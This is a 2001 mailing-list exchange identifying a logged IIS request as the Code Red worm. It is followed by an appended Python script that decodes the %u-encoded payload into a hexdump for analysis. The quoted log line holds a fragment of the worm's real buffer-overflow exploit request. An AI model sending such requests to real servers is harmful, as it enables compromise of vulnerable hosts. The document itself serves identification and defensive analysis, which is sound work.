>>>>> "Brian" == Brian Rectanus <[EMAIL PROTECTED]> writes:
Brian> Anyone seen this before? I have looked around for similar
Brian> attacks, but cannot find any info. I assume that is a
Brian> unicode string padded out with Ns. How would I go about
Brian> finding out what is in the string?
Brian> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
Brian> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Brian> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Brian> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Brian> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
Brian> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
Brian> 078%u0000%u00=a HTTP/1.0" 400 328
"Code Red" --> IIS
http://www.cert.org/incident_notes/IN-2001-08.html
Seems to be quite efficient, seven attempts so far ...
--
(Dr.) Michael Hummel
mailto: [EMAIL PROTECTED] || [EMAIL PROTECTED]
--
fprint = F24D EAC6 E3D7 372C 9122 D510 EB24 01CA 0B56 B518
id: 1024D/0B56B518 key: http://www.seitung.net/key
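
To answer the question quoted above (how to find out what is in the string), here is an added example that is not part of the original message: it unwraps the mail-quoted log line and turns the `%uXXXX` units into raw bytes for inspection. It assumes each unit is a 16-bit value stored low byte first, as on x86 Windows; `SAMPLE` is a constructed, shortened copy of the quoted request, and the function names are hypothetical.

```python
import re

# Constructed sample: shortened copy of the quoted request, still wrapped by
# the mailer and carrying the "Brian> " citation prefix.
SAMPLE = """\
Brian> /default.ida?NNNNNNNN%u9090%u6858%ucbd3%u7801%u9
Brian> 090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
Brian> 078%u0000%u00=a HTTP/1.0" 400 328
"""

QUOTE_PREFIX = re.compile(r"^\w*> ?", re.M)   # "Brian> " or "> "
UNIT = re.compile(r"%u([0-9a-fA-F]{4})")      # one 16-bit unit


def unwrap(quoted):
    """Drop citation prefixes and rejoin the wrapped log line."""
    return "".join(QUOTE_PREFIX.sub("", quoted).splitlines())


def decode_units(request):
    """Return (padding length, decoded bytes, undecoded tail) of the query."""
    query = request.partition("?")[2].split(" ", 1)[0]
    first = UNIT.search(query)
    if first is None:
        return len(query), b"", ""
    data, pos = bytearray(), first.start()
    while (m := UNIT.match(query, pos)):
        # Assumption: units are stored low byte first (little-endian x86).
        data += int(m.group(1), 16).to_bytes(2, "little")
        pos = m.end()
    return first.start(), bytes(data), query[pos:]


def hexdump(data, width=16):
    """Offset-prefixed hex rows, for pasting into a report or a disassembler."""
    return "\n".join(f"{off:04x}  {data[off:off + width].hex(' ')}"
                     for off in range(0, len(data), width))


if __name__ == "__main__":
    padding, data, tail = decode_units(unwrap(SAMPLE))
    print(f"padding: {padding} bytes, decoded: {len(data)} bytes, tail: {tail!r}")
    print(hexdump(data))
```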